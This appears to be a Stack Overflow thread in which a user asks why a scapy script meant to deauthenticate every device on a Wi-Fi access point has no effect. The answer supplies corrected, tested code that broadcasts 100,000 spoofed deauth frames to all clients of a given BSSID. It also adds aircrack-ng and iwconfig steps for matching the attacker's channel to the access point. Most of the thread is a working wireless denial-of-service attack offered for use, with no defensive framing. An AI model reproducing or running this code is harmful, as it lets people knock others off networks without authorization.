# Why is my scapy deauth function not working?

Tags: python, scapy

When I run this function I am still able to refresh any page, watch videos online, the devices on my network do not get disconnected, isn't this function supposed to dos all devices over the access point, I can see the packets in wireshark but i do still have internet connection

why is it not working?

```
#!/usr/bin/env python3
from scapy.all import (
  RadioTap,    # Adds additional metadata to an 802.11 frame
  Dot11,       # For creating 802.11 frame
  Dot11Deauth, # For creating deauth frame
  sendp        # for sending packets
)


def deauth_me(target , bssid):
    
    

    dot11 = Dot11(addr1=bssid, addr2=target, addr3=bssid)
    frame = RadioTap()/dot11/Dot11Deauth()
    sendp(frame, iface="wlan0mon", count=100000, inter=0.900)


    pass

deauth_me(target="ff:ff:ff:ff:ff:ff" , bssid="6c:6f:26:96:57:3d")
```

Comment: Some devices will ignore 802.11 deauth packets. Also make sure the packets are actually sent (your adapter supports packet injection. very few do)

Comment: And even if your adapter supports injection, I can say from recent experience that driver issues can cause problems as well.

Comment: how to check if adapter supports packet injection

Answer (score 1):

I took a look at the code you provided and I did notice a problem.

The fix is to change the values of addr1 and addr2 when you initialize the dot11 variable.

Check out [this StackOverflow](https://stackoverflow.com/questions/61157107/deauth-attack-with-scapy-in-python) post with the MAC addresses it gives to addr1, addr2, and addr3. In summary, addr1 should be the MAC address of the target and addr2 & addr3 should be the BSSID MAC address.

Working code:

```
#!/usr/bin/env python3
from scapy.all import (
  RadioTap,    # Adds additional metadata to an 802.11 frame
  Dot11,       # For creating 802.11 frame
  Dot11Deauth, # For creating deauth frame
  sendp        # for sending packets
)


def deauth_me(target , bssid):
    dot11 = Dot11(addr1=target, addr2=bssid, addr3=bssid)
    frame = RadioTap()/dot11/Dot11Deauth()
    sendp(frame, iface="wlan0mon", count=100000, inter=0.90)


    pass

deauth_me(target="ff:ff:ff:ff:ff:ff" , bssid="6c:6f:26:96:57:3d")
```

I tested this code and was able to successfully disconnect my phone from a WiFi network.

Another issue you might run into is that your wireless interface is operating on a different channel than your access point. Unfortunately, scapy won't tell you if you are on the wrong channel. I was only able to find this out by using aircrack-ng.

If you use aircrack-ng and the channels are not aligned, the error will be something like this (X and Y would be replaced with the actual channels):

```
wlan0mon is on channel X, but the AP uses channel Y
```

And if you want to change the channel your wireless interface uses, all you have to do is:

```
iwconfig wlan0mon channel Y
```